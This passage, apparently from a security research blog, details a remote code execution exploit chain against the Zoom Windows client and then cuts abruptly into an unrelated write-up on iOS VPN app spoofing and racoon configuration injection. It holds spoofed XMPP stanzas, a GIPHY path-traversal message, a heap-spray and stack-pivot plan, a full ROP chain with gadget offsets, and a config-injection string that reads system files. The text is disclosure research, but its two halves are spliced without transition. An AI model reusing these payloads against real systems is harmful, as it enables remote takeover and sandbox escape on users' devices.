      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>
    </members>
  </zoom>
</presence>
While a client only expects this stanza from the server, it is possible to send it from a different user account. It is then handled if the sender is not yet in the user's contact list. So combining these two things, we ended up with the following:
<presence from="[email protected]/ZoomChat_pc" to="[email protected]/ZoomChat_pc">
  <zoom xmlns="zm:x:group" group="Apps##61##addon.SX4KFcQMRN2XGQ193ucHPw" action="add_member" option="0" diff="0:0">
    <members>
      <member fname="SurveyMonkey" lname="" jid="[email protected]" type="1" cmd="/sm" pic_url="https://marketplacecontent.zoom.us//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" pic_relative_url="example.org//CSKvJMq_RlSOESfMvUk-dw/nhYXYiTzSYWf4mM3ZO4_dw/app/UF-vuzIGQuu3WviGzDM6Eg/iGpmOSiuQr6qEYgWh15UKA.png" introduction="Manage SurveyMonkey surveys from your Zoom chat channel." signature="" extension="eyJub3RTaG93IjowLCJjbWRNb2RpZnlUaW1lIjoxNTc4NTg4NjA4NDE5fQ=="/>
    </members>
  </zoom>
</presence>
The pic_url attribute here is ignored. Instead, the pic_relative_url attribute is used, with "https://marketplacecontent.zoom.us" prepended to it. This means a request is performed to:
Because this is not restricted to subdomains of zoom.us, we could redirect it to a server we control.
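The effect of prepending a fixed prefix to an attacker-supplied value can be sketched in a few lines of Python. This is only an illustration of the behaviour described above, not Zoom's code: the function names and the shortened paths are made up, and the stricter host check at the end is an assumption about what a safer client could do.

```python
from urllib.parse import urlsplit

PREFIX = "https://marketplacecontent.zoom.us"  # prefix named in the text


def build_picture_url(pic_relative_url: str) -> str:
    """Naive concatenation, matching the behaviour described above."""
    return PREFIX + pic_relative_url


def host_of(url: str) -> str:
    """Return the host name a client would actually connect to."""
    return urlsplit(url).hostname or ""


def is_zoom_host(host: str) -> bool:
    """Stricter check (assumption): zoom.us itself or a real subdomain."""
    return host == "zoom.us" or host.endswith(".zoom.us")


# Shortened, hypothetical paths; only the leading part matters here.
normal = build_picture_url("//some/path/app.png")
crafted = build_picture_url("example.org//some/path/app.png")

print(host_of(normal), is_zoom_host(host_of(normal)))
print(host_of(crafted), is_zoom_host(host_of(crafted)))
```

Because the value does not have to start with a slash, the text it begins with becomes part of the host name, so the resulting host is no longer under zoom.us.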
We are still not fully sure why this worked, but it worked. This is one of two additional, low-impact bugs we used for our attack, and it has also been fixed according to the Zoom Security Bulletin. On its own, this could be used to obtain the external IP address of another user if they are signed in to Zoom, even when you are not a contact.
Setting up a direct connection was very helpful for us, because we had much more control over this connection than over the XMPP connection. The XMPP connection is not direct, but goes through the server. This meant that invalid XML would not reach us. As the addresses we wanted to leak were unlikely to consist entirely of printable characters, we couldn’t try to get these included in a stanza that would reach us. With a direct connection, we were not restricted in any way.
Our plan was to do the following:
Initiate an HTTPS request using a URL with a query part of 1087 bytes to a server we control.
Accept the connection, but delay responding to the TLS handshake.
Trigger the buffer overflow such that the buffer we overflow is immediately before the block containing the query part of the URL. This overwrites the heap header of the query block, the entire query (including the zero-terminator at the end) and the next heap header.
Let the TLS handshake proceed.
Receive the query, with the heap header and start of the next block in the HTTP request.
This video illustrates how this works:
In essence, this is similar to creating an object, overwriting a length field and reading it. Instead of a counter for the length, we overwrite the zero-terminator of a string by writing all the way over the contents of a buffer.
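The idea of reading past an overwritten zero-terminator can be modelled with a plain byte array. The sketch below is a toy simulation only: the layout, sizes and contents are made up, heap headers are left out, and nothing here touches real process memory.

```python
def read_c_string(memory: bytes, start: int) -> bytes:
    """Return the bytes from start up to (not including) the first zero byte."""
    end = memory.index(b"\x00", start)
    return memory[start:end]


# Toy layout (sizes are illustrative assumptions):
# [buffer that gets overflowed][query string + terminator][next block]
buffer_size = 8
query = b"q=abc"
next_block = b"\x40\x7a\x15\x70\x00\x00\x00\x00"  # pointer-like bytes, then zeros

memory = bytearray(b"\x00" * buffer_size + query + b"\x00" + next_block)
query_start = buffer_size

before = read_c_string(bytes(memory), query_start)

# The overflow writes non-zero filler over the buffer, the query
# and the query's zero-terminator.
overflow_len = buffer_size + len(query) + 1
memory[0:overflow_len] = b"A" * overflow_len

after = read_c_string(bytes(memory), query_start)

print(before)
print(after)
```

Before the overflow the string ends at its own terminator. Afterwards, anything that treats the query as a C string keeps reading into the next block until it reaches that block's first zero byte.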
This allowed us to leak data from the start of the next block up to the first null-byte in it. Conveniently, we had also found an interesting object to place there in the source of OpenSSL, libcrypto-1_1.dll to be specific. TLS1_PRF_PKEY_CTX is an object which is used during a TLS handshake to verify a MAC of the transcript during a handshake, to make sure an active attacker has not changed anything during the handshake. This struct starts with a pointer to another structure inside the same DLL (a static structure for a hashing function).
typedef struct {
    /* Digest to use for PRF */
    const EVP_MD *md;
    /* Secret value to use for PRF */
    unsigned char *sec;
    size_t seclen;
    /* Buffer of concatenated seed data */
    unsigned char seed[TLS1_PRF_MAXBUF];
    size_t seedlen;
} TLS1_PRF_PKEY_CTX;
There is one downside to this object: it is created, used and deallocated within one function call. But luckily, OpenSSL does not clear the full contents of the object, so the pointer at the start remains in the deallocated block:
This means that we could leak the pointer we want, but in order to do so we would need to place three objects just right. We needed to place 3 blocks in the right order in a bucket: the block we overflow, the query part of a URL for our initiated HTTPS request and a deallocated TLS1_PRF_PKEY_CTX object. One common way for defeating heap randomization in exploits is to just allocate a lot of objects and try often, but it’s not that simple in this case: we need enough objects and overflows to have a chance of success, but also not too many to still allow deallocated TLS1_PRF_PKEY_CTX objects to remain. If we allocated too many queries, no TLS1_PRF_PKEY_CTX objects would be left. This was a difficult balance to hit.
We tried this a lot and it took days, but eventually we leaked the address once. Then, a few days later, it worked again. And then again the same day. Slowly we were finding the right balance of the number of objects, connections and overflows.
The @z\x15p (0x70157a40) here is the leaked address in libcrypto-1_1.dll:
One thing that greatly increased the chances of success was to use TLS renegotiation. The TLS1_PRF_PKEY_CTX object is created during a handshake, but setting up new connections takes time and does a lot of allocations that could disturb our heap bucket. We found that we could also set up a connection and use TLS renegotiation repeatedly, which meant that the handshake was performed again but nothing else. OpenSSL supports renegotiation, and even if you want to renegotiate thousands of times without ever sending an HTTP response this is entirely fine. We ended up creating 3 connections to a webserver that was doing nothing other than constantly renegotiating. This allowed us to create a constant stream of new deallocated TLS1_PRF_PKEY_CTX objects in the deallocated space in the bucket.
The info leak did however remain the most unstable part of our exploit. If you watch the video of our exploit back, then the longest delay will be waiting for the info leak. Vincent from ZDI mentions when the info leak happens during the second attempt. As you can see, the rest of the exploit completes quite quickly after that.
Step 11: Control
The next step was to find an object where we could overwrite a vtable or function pointer. Here, again, we found a useful open source component in a DLL. The file viper.dll contains a copy of the WebRTC library from around 2012. Initially, we found that when a call invite is received (even if it is not answered), viper.dll creates 5 objects of 1064 bytes which all start with a vtable. By searching the WebRTC source code we found that these were FileWrapperImpl objects. These can be seen as adding a C++ API around FILE * pointers from C: methods for writing and reading data, automatic closing and flushing in the destructor, etc. There was one downside: these 5 objects were doing nothing. If we overwrote their vtable in the debugger, nothing would happen until we exited Zoom; only then would the destructor call some vtable functions.
class FileWrapperImpl : public FileWrapper {
 public:
  FileWrapperImpl();
  ~FileWrapperImpl() override;

  int FileName(char* file_name_utf8, size_t size) const override;
  bool Open() const override;
  int OpenFile(const char* file_name_utf8, bool read_only, bool loop = false, bool text = false) override;
  int OpenFromFileHandle(FILE* handle, bool manage_file, bool read_only, bool loop = false) override;
  int CloseFile() override;
  int SetMaxFileSize(size_t bytes) override;
  int Flush() override;
  int Read(void* buf, size_t length) override;
  bool Write(const void* buf, size_t length) override;
  int WriteText(const char* format, ...) override;
  int Rewind() override;

 private:
  int CloseFileImpl();
  int FlushImpl();

  std::unique_ptr<RWLockWrapper> rw_lock_;
  FILE* id_;
  bool managed_file_handle_;
  bool open_;
  bool looping_;
  bool read_only_;
  size_t max_size_in_bytes_;  // -1 indicates file size limitation is off
  size_t size_in_bytes_;
  char file_name_utf8_[kMaxFileNameSize];
};
Code execution at exit was far from ideal: this would mean we had just one shot in each attempt. If we had failed to overwrite a vtable we would have no chance to try again. We also did not have a way to remotely trigger a clean exit, but even if we had, the chances that we could exit successfully were small. The information leak will have corrupted many objects and heap metadata in the previous phase, which maybe didn’t affect anything yet if those objects are unused, but which could cause a crash in destructors or when freeing memory if we tried to exit.
Based on the WebRTC source code, we noticed the FileWrapperImpl objects are often used in classes related to audio playback. As it happens, the Windows VM Thijs was using at that time did not have an emulated sound card. There was no need for one, as we were not looking at exploiting the actual meeting functionality. Daan suggested adding one, because it could matter for these objects. Thijs was skeptical, but security involves trying a lot of things you don’t expect to work, so he added one. After this, the creation of FileWrapperImpls had indeed changed significantly.
With an emulated sound card, new FileWrapperImpls were created and destroyed regularly while the call was ringing. Each loop of the jingle seemed to trigger a number of allocations and frees of these objects. It is a shame the videos we have of the exploit do not have sound: you would have heard the ringing sound complete a couple of full loops at the moment it exits and calc is started.
This meant we had a vtable pointer we could overwrite quite reliably, but now the question is: what to write there?
Step 12: GIPHY time
We had obtained the offset of libcrypto-1_1.dll using our information leak, but we also needed an address of data under our control: if we overwrite a vtable pointer, then it needs to point to an area containing one or more function pointers. ASLR means we don’t know for sure where our heap allocations end up. To deal with this, we used GIFs.
To send an out-of-meeting message in Zoom, the receiving user has to have previously accepted a connect request or be in a multi-user chat with the attacker. If a user is able to send a message with an image to another user in Zoom, then that image is downloaded and shown automatically if it is below a few megabytes. If it is larger, the user needs to click on it to download it.
In the Zoom chat client, it is also possible to send GIFs from GIPHY. For these images, the file size restriction is not applied and the files are always downloaded and shown. User uploads and GIPHY files are both downloaded from the same domain, but using different paths. By sending an XMPP message for sending a GIPHY, but using path traversal to point it to a user uploaded GIF file instead, we found that we could allow the downloading of arbitrary sized GIF files. If the file is a valid GIF file, then it is loaded into memory. If we send the same link again then it is not downloaded twice, but a new copy is allocated in memory. This is the second low impact vulnerability we used, which is also fixed according to the Zoom Security Bulletin.
A normal GIPHY message:
<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc"><body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body><thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread><active xmlns="http://jabber.org/protocol/chatstates"/><sns><format>%1$@ sent you an image</format><args><arg>John Doe</arg></args></sns><zmext><msg_type>12</msg_type><from n="John Doe" res="ZoomChat_pc"/><to/><visible>true</visible><msg_feature>16384</msg_feature></zmext><giphyv2 id="YQitE4YNQNahy" url="https://giphy.com/gifs/YQitE4YNQNahy" tags="hacker"><pcInfo url="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX" size="1456787"/><mobileInfo url="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk" size="549356"/><bigPicInfo url="https://file.zoom.us/external/link/issue?id=1::hA-lI2ZGxBzgJczWbR4yPQ::ZxQquub32hKf5Tle_fRKGQ::TnskidmcXKrAUhyi4UP_QGp2qGXkApB2u9xEFRp5RHsZu1F6EL1zd-6mAaU7Cm0TiPQnALOnk1-ggJhnbL_S4czgttgdHVRKHP015TcbRo92RVCI351AO8caIsVYyEW5zpoTSmwsoR8t5E6gv4Wbmjx263lTi 1aWl62KifvJ_LDECBM1" size="4322534"/></giphyv2></message>
A GIPHY message with a manipulated path (only the bigPicInfo URL is relevant):
<message xmlns="jabber:client" to="[email protected]" id="{62BFB8B6-9572-455C-B440-98F532517177}" type="chat" from="[email protected]/ZoomChat_pc"><body>John Doe sent you a GIF image. In order to view it, please upgrade to the latest version that supports GIFs: https://www.zoom.us/download</body><thread>gloox{F1FFE4F0-381E-472B-813B-55D766B87742}</thread><active xmlns="http://jabber.org/protocol/chatstates"/><sns><format>%1$@ sent you an image</format><args><arg>John Doe</arg></args></sns><zmext><msg_type>12</msg_type><from n="John Doe" res="ZoomChat_pc"/><to/><visible>true</visible><msg_feature>16384</msg_feature></zmext><giphyv2 id="YQitE4YNQNahy" url="https://giphy.com/gifs/YQitE4YNQNahy" tags="hacker"><pcInfo url="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX" size="1456787"/><mobileInfo url="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk" size="549356"/><bigPicInfo url="https://file.zoom.us/external/link/issue/../../../file/[file_id]" size="4322534"/></giphyv2></message>
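To see why the manipulated bigPicInfo URL ends up somewhere else, it helps to resolve the `..` segments by hand. The following Python sketch does that with the standard library. How the real server resolves paths is not something we can show here, so treat `posixpath.normpath` as a stand-in; `FILE_ID` and the shortened query string are placeholders, and the prefix check is an assumption about what a stricter client could do.

```python
import posixpath
from urllib.parse import urlsplit


def resolved_path(url: str) -> str:
    """Collapse '.' and '..' segments, as a server or proxy typically would."""
    return posixpath.normpath(urlsplit(url).path)


def stays_under(url: str, prefix: str) -> bool:
    """Compare the resolved path, not the raw string, with an allowed prefix."""
    path = resolved_path(url)
    return path == prefix or path.startswith(prefix + "/")


# Placeholder values; the real identifiers are elided in the text.
giphy = "https://file.zoom.us/external/link/issue?id=1::example"
crafted = "https://file.zoom.us/external/link/issue/../../../file/FILE_ID"

print(resolved_path(giphy), stays_under(giphy, "/external/link"))
print(resolved_path(crafted), stays_under(crafted, "/external/link"))
```

A check on the raw string would still see a URL starting with /external/link/issue, while the resolved path points at the user upload location.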
Our plan was to create a 25 MB GIF file and allocate it multiple times to create a specific address where the data we needed would be placed. Large allocations of this size are randomized when ASLR is used, but these allocations are still page aligned. Because the data we wanted to place was much less than one page, we could just create one page of data and repeat that. This page started with a minimal GIF file, which was enough for the entire file to be considered a valid GIF file. Because Zoom is a 32-bit application, the possible address space is very small. If enough copies of the GIF file are loaded in memory (say, around 512 MB), then we can quite reliably “guess” that a specific address falls inside a GIF file. Due to the page-alignment of these large allocations, we can then use offsets from the page boundary to locate the data we want to refer to.
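The page-alignment argument comes down to simple arithmetic, which the Python sketch below walks through. It is only a model: a 4 KiB page size is assumed, the two allocation bases are invented, and the page contents are dummy bytes. The point is that when a page-aligned allocation is filled with one repeating page, the content found at a guessed address depends only on the offset of that address within its page.

```python
PAGE_SIZE = 0x1000             # assumption: 4 KiB pages
GIF_SIZE = 25 * 1024 * 1024    # 25 MB, as in the text


def page_offset(address: int) -> int:
    """Offset of an address within its page."""
    return address & (PAGE_SIZE - 1)


def byte_at(allocation_base: int, page: bytes, address: int) -> int:
    """Byte found at `address` in an allocation filled with a repeating page."""
    assert allocation_base % PAGE_SIZE == 0, "large allocations are page aligned"
    assert allocation_base <= address < allocation_base + GIF_SIZE
    return page[page_offset(address)]


# Dummy page contents: byte i holds i modulo 256.
page = bytes(i % 256 for i in range(PAGE_SIZE))

guess = 0x462BC020             # example address, used only for illustration
base_a = 0x45000000            # two hypothetical places the GIF could land
base_b = 0x46200000

print(hex(page_offset(guess)))
print(byte_at(base_a, page, guess), byte_at(base_b, page, guess))
```

Whichever of the two bases the allocation ends up at, the guessed address sees the same byte, because both bases are multiples of the page size.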
Step 13: Pivot into ROP
Now we have all the ingredients to call an address in libcrypto-1_1.dll. But to gain arbitrary code execution, we would (probably) need to call multiple functions. For stack buffer overflows in modern software this is commonly achieved using return-oriented programming (ROP). By placing return addresses on the stack to call functions or perform specific register operations, multiple functions can be called sequentially with control over the arguments.
We had a heap buffer overflow, so we could not do anything with the stack just yet. The way we did this is known as a stack pivot: we changed the stack pointer so that it points to data we control. We found the following sequence of instructions in libcrypto-1_1.dll:
push edi; # points to vtable pointer (memory we control)
pop esp;  # now the stack pointer points to memory under our control
pop edi;  # pop some extra registers
pop esi;
pop ebx;
pop ebp;
ret
This sequence is misaligned and normally does something else, but for us this could be used to copy the address of data we overwrote (held in edi) into the stack pointer. This means that we have replaced the stack with data we wrote with the buffer overflow.
From our ROP chain we wanted to call VirtualProtect to enable the execute bit for our shellcode. However, libcrypto-1_1.dll does not import VirtualProtect, so we don’t have the address for this yet. Raw system calls from 32-bit Windows applications are, apparently, difficult. Therefore, we used the following ROP chain:
Call GetModuleHandleW to get the base address of kernel32.dll.
Call GetProcAddress to get the address of VirtualProtect from kernel32.dll.
Call that address to make the GIF data executable.
Jump to the shellcode offset in the GIF.
In the following animation, you can see how we overwrite the vtable, and then when Close is called the stack is pivoted to our buffer overflow. Due to the extra pop instructions in the stack pivot gadget, some unused values are popped. Then, the ROP chain starts by calling GetModuleHandleW with the string "kernel32.dll" from our GIF file as its argument. Finally, when returning from that function, a gadget is called that places the result value into ebx. The calling convention in use here means the argument is passed via the stack, before the return address.
In our exploit this results in the following ROP stack (crypto_base points to the load address of libcrypto-1_1.dll we leaked earlier):
# push edi; pop esp; pop edi; pop esi; pop ebx; pop ebp; ret
STACK_PIVOT = crypto_base + 0x441e9
GIF_BASE = 0x462bc020
VTABLE = GIF_BASE + 0x1c  # Start of the correct vtable
SHELLCODE = GIF_BASE + 0x7fd  # Location of our shellcode
KERNEL32_STR = GIF_BASE + 0x6c  # Location of UTF-16 Kernel32.dll string
VIRTUALPROTECT_STR = GIF_BASE + 0x86  # Location of VirtualProtect string
KNOWN_MAPPED = 0x2fe451e4
JMP_GETMODULEHANDLEW = crypto_base + 0x1c5c36  # jmp GetModuleHandleW
JMP_GETPROCADDRESS = crypto_base + 0x1c5c3c  # jmp GetProcAddress
RET = crypto_base + 0xdc28  # ret
POP_RET = crypto_base + 0xdc27  # pop ebp; ret
ADD_ESP_24 = crypto_base + 0x6c42e  # add esp, 0x18; ret
PUSH_EAX_STACK = crypto_base + 0xdbaa9  # mov dword ptr [esp + 0x1c], eax; call ebx
POP_EBX = crypto_base + 0x16cfc  # pop ebx; ret
JMP_EAX = crypto_base + 0x23370  # jmp eax

rop_stack = [
    VTABLE,  # pop edi
    GIF_BASE + 0x101f4,  # pop esi
    GIF_BASE + 0x101f4,  # pop ebx
    KNOWN_MAPPED + 0x20,  # pop ebp
    JMP_GETMODULEHANDLEW,
    POP_EBX,
    KERNEL32_STR,
    ADD_ESP_24,
    PUSH_EAX_STACK,
    0x41414141,
    POP_RET,  # Not used, padding for other objects
    0x41414141,
    0x41414141,
    0x41414141,
    JMP_GETPROCADDRESS,
    JMP_EAX,
    KNOWN_MAPPED + 0x10,  # This will be overwritten with the base address of Kernel32.dll
    VIRTUALPROTECT_STR,
    SHELLCODE,
    SHELLCODE & 0xfffff000,
    0x1000,
    0x40,
    SHELLCODE - 8,
]
And that’s it! We now had a reverse shell and could launch calc.exe.
Reliability, reliability, reliability
The last week before the contest was focused on getting it to an acceptable reliability level. As we mentioned in the info leak, this phase was very tricky. It took a lot of time to get it to having even a tiny chance to succeed. We had to overwrite a lot of data here, but the application had to remain stable enough that we could still perform the second phase without crashing.
There were a lot of things we did to improve the reliability and many more we tried and gave up. These can be summarized in two categories: decreasing the chance that we overwrote something we shouldn’t and decreasing the chance that the client would crash when we had overwritten something we didn’t intend to.
In the second phase, it could happen that we overwrote the vtable of a different object. Whenever we had a crash like this, we would try to fix it by placing a compatible no-op function on the corresponding place in the vtable. This is harder than it sounds on 32-bit Windows, because there are multiple calling conventions involved and some require the RET instruction to pop the arguments from the stack, which means that we needed a no-op that pops the right number of values.
In the first phase, we also had a chance of overwriting pointers in objects in the same size range. We could not yet deal with function pointers or vtables as we had no info leak, but we could place pointers to readable/writable memory. We started our exploit by uploading some GIF files to create known addresses with controlled data before this phase so we could use those addresses in the data we used for the overflow. Of course, the data in the GIF files could again be dereferenced as a pointer, requiring multiple layers of fake addresses.
What may not yet be clear is that each attempt required a slow manual process. Each time we wanted to run our exploit, we would launch the client, clear all chat messages for the victim, exit the client and launch it again. Because the memory layout was so important, we had to make sure we started from an identical state each time. We had not automated this, because we were paranoid about ensuring the client would be used in exactly the same way as during the contest. Anything we did differently could influence the heap layout. For example, we noticed that adding network interception could have some effect on how network requests were allocated, changing the heap layout. Our attempts were often close to 5 minutes, so even just doing 10 attempts took an hour. To assess if a change improved the reliability, 10 runs was pretty low.
Both the info leak and the vtable overwrite phase run in loops. If we were lucky, we had success in the first iteration of the loop, but it could go on for a long time. To improve our chance of success in the time limit, our exploit would slowly increase the risk it took the more iterations it needed. In the first iteration we would only overflow a small number of times and only one object, but this would increase to more and more overflows with larger sizes the longer it took.
In the second phase we could take more risks. The application did not need to remain stable enough for another phase and we only needed two adjacent allocations, not also a third unallocated block. By overwriting 10 blocks further, we had a very good chance of hitting the needed object with just one or two iterations.
In the end, we estimated that our exploit had about a 50% chance of success in the 5 minutes. If, on the other hand, we could leak the address of libcrypto-1_1.dll in one run and then skip the info leak in the next run (the locations of ASLR-randomized DLLs remain the same on Windows for some time), we could increase our reliability to around 75%. ZDI informed us during the contest that this would result in a partial win, but it never got to the point where we could do that. The first attempt failed in the first phase.
Conclusion
After we handed in our final exploit, the nerve-wracking process of waiting started. Since we needed to hand in our final exploit two days before the event and the organizers would not run our exploit until our attempt, it was out of our hands. Even during the attempts we could not see the attacker’s screen, for example, so we had no idea if everything worked as planned. The enormous relief when calc.exe popped up made it worth it in the end.
In total we spent around 1.5 weeks from the start of our research until we had the main vulnerability of our exploit. Writing and testing the exploit itself took another 1.5 months, including the time we needed to read up on all Windows internals we needed for our exploit.
We would like to thank ZDI and Zoom for organizing this year’s event, and hopefully see you guys next year!
Since iOS version 8, support has been present for third-party apps to implement Network Extensions. Network Extensions can be a variety of things that can all inspect or modify network traffic in some way, like ad-blockers and VPNs.
For VPNs there are actually three variants that a Network Extension can implement: a “Personal VPN”, where the app supplies only a configuration for a built-in VPN type (IPsec), or the app can implement the code for the VPN itself, either as “Packet Tunnel Provider” or “App Proxy Provider”. We did not spend any time on the latter two, but only investigated Personal VPNs.
To install a VPN Network Extension, the user needs to approve it. This is a little different from other permission prompts in iOS: the user needs to approve it and then also enter their passcode. This makes sense because a VPN can be very invasive, so users must be aware of the installation. If the user uninstalls the app, then any Personal VPN configurations it added are also automatically removed.
Bug 1: App spoofing
To request the addition of a new VPN configuration, the app sends a request to the nehelper daemon using an NSXPCConnection. NSXPCConnection is a high-level API built on XPC that can be used to call specific Objective-C methods between processes. Arguments that are passed to the method are serialized using NSSecureCoding. The object representing the configuration of a Network Extension is an object of the class NEConfiguration. As can be seen from the following class dump of NEConfiguration, the name (_applicationName) and app bundle identifier (_application) of the app which created the request are included in this object:
It turns out that the permission prompt used that name, instead of the actual name of the app that the user would be familiar with. Because that is part of an object received from the app, this means that it could present the name of an entirely different app, for example one the user might be more inclined to trust as a VPN provider. Because it is even possible to add newlines in this value, a malicious app could even attempt to obfuscate what the prompt is actually asking, for example by making it seem like a prompt about installing a software update (where users would expect to enter their passcode).
It is also possible to change the app bundle identifier to something else. By doing this, the VPN configuration is no longer automatically removed when the user uninstalls the app. Therefore, the configuration persists even when the user thinks they removed it by removing the app.
So, by calling these private methods:
NEVPNManager *manager = [NEVPNManager sharedManager];
...
NEConfiguration *configuration = [manager configuration];
[configuration setApplication:nil];
[configuration setApplicationName:@"New Network Settings for 4G"];
[manager saveToPreferencesWithCompletionHandler:^(NSError *error) {
    ...
}];
This results in the following permission prompt:
And this configuration is not automatically removed when uninstalling the app.
IPsec VPNs are handled on iOS by racoon, an IPsec implementation that is part of the open source project ipsec-tools. Note that the upstream project for this was abandoned in 2014:
Important Note
The development of ipsec-tools has been ABANDONED.
ipsec-tools has security issues, and you should not use it. Please switch to a secure alternative!
Whenever an IPsec VPN is asked to connect, the system generates a new racoon configuration file, places it in /var/run/racoon/ and tells racoon to reload its configuration. This happens no matter where the VPN configuration came from: a manually added VPN, Personal VPN Network Extension app or a VPN configuration from a .mobileconfig profile.
While playing around with the configuration options, we noticed a strange error whenever we included a " character in the “Group name” or “Account Name” values. As it turns out, these values are copied literally to the configuration file without any escaping. Because the string itself was enclosed in quotes, this resulted in a syntax error. By using ";, it was possible to add new racoon configuration options.
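The general pattern behind this kind of bug can be shown with a small Python sketch. Note that everything here is hypothetical: `group_name` is a made-up directive, the template is not the one iOS uses to generate the racoon configuration, and the statement counter is a toy that ignores quoting. The validation function is likewise only one possible way to reject dangerous values, not a description of Apple's fix.

```python
def render_unescaped(group_name: str) -> str:
    """Hypothetical generator: pastes the value between quotes as-is."""
    return f'group_name "{group_name}";'


def count_statements(config_line: str) -> int:
    """Count ';'-terminated statements (toy parser, ignores quoting)."""
    return sum(1 for part in config_line.split(";") if part.strip())


def render_validated(group_name: str) -> str:
    """Refuse characters that could end the quoted string or the statement."""
    forbidden = set('"\\;\n\r')
    if forbidden & set(group_name):
        raise ValueError("unsupported character in group name")
    return render_unescaped(group_name)


benign = render_unescaped("A")
injected = render_unescaped('A"; my_identifier keyid file "/etc/master.passwd')

print(benign)
print(injected)
```

With a plain value the output is a single statement. With a value that closes the quote and adds `;`, the same template yields two statements, and the trailing quote and semicolon from the template neatly complete the injected one.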
Racoon supports many more configuration options than what is available via the UI, a Personal VPN API or a .mobileconfig file. Some of those could have an effect that should not be allowed for an app, even though it may be approved as a Network Extension. If you check the man page, you might notice script as an interesting option. Sadly, this is not included in the build on iOS.
One interesting option that did work was the following:
A"; my_identifier keyid file "/etc/master.passwd
This results in the following line in the configuration file:
This second option tells racoon to read its group name from the file /etc/master.passwd, which overrides the previous option. Using this as a group name would cause the contents of /etc/master.passwd to be included in the initial IPsec packet:
Of course, on iOS the /etc/master.passwd file is not sensitive as it is always the same, but there are various system locations that racoon is allowed to read from due to its sandbox configuration:
/var/root/Library/
/private/etc/
/Library/Preferences/
There is, however, an important limitation. The group name is added to the initial handshake message. This packet is sent over UDP, so the entire packet can be at most 65,535 bytes. The group name value is not truncated, so any file larger than 65,535 bytes, minus the overhead for the rest of the packet and the IP and UDP headers, cannot be read.
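As a rough back-of-the-envelope calculation, the size limit can be written out in Python. The IPv4 and UDP header sizes are the standard minimums; the overhead of the rest of the handshake message is not given in the text, so `ISAKMP_OVERHEAD` below is a placeholder value chosen purely for illustration.

```python
MAX_IP_PACKET = 65_535   # upper bound quoted in the text
IPV4_HEADER = 20         # minimum IPv4 header without options
UDP_HEADER = 8
ISAKMP_OVERHEAD = 200    # assumption: placeholder for the rest of the message


def max_udp_payload() -> int:
    """Largest UDP payload that fits in one IPv4 packet."""
    return MAX_IP_PACKET - IPV4_HEADER - UDP_HEADER


def file_fits(file_size: int, overhead: int = ISAKMP_OVERHEAD) -> bool:
    """Whether a file of this size could still fit in a single handshake packet."""
    return file_size <= max_udp_payload() - overhead


print(max_udp_payload())
print(file_fits(1024), file_fits(65_507))
```

The exact cut-off depends on the real size of the other fields in the handshake message, so the numbers above only indicate the order of magnitude.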
For example, the following files were often found to be below the limit and may contain sensitive information that would normally not be available to an app:
By exploiting this issue, a Network Extension app could read from files that would normally not be allowed due to the app sandbox. Other potential impact could include accessing Keychain items or deleting files in those directories by changing the pid file location.
Apple initially indicated that they planned to release a fix in iOS 13.5, but we found no changes in that version. Then, they applied a fix in iOS 13.6 beta 2 that attempted to filter out racoon options from these fields, which was easily bypassed by replacing the spaces in the example with tabs. Finally, in the release of iOS 13.6 this was actually fixed. Sadly, due to this back and forth, Apple seems to have forgotten to include it in their changelog, even after multiple reminders.
Bug 3: OOB reads (CVE-2020-9837)
As mentioned, the upstream project for racoon is abandoned and it indicates that it contains known security issues. Apple has patched quite a few vulnerabilities in racoon over the years (in the iOS 5 era even being used for a jailbreak), but likely because there is no upstream project, these fixes were often not correct or incomplete. In particular, we noticed that some bounds checks Apple added were off by a small amount.
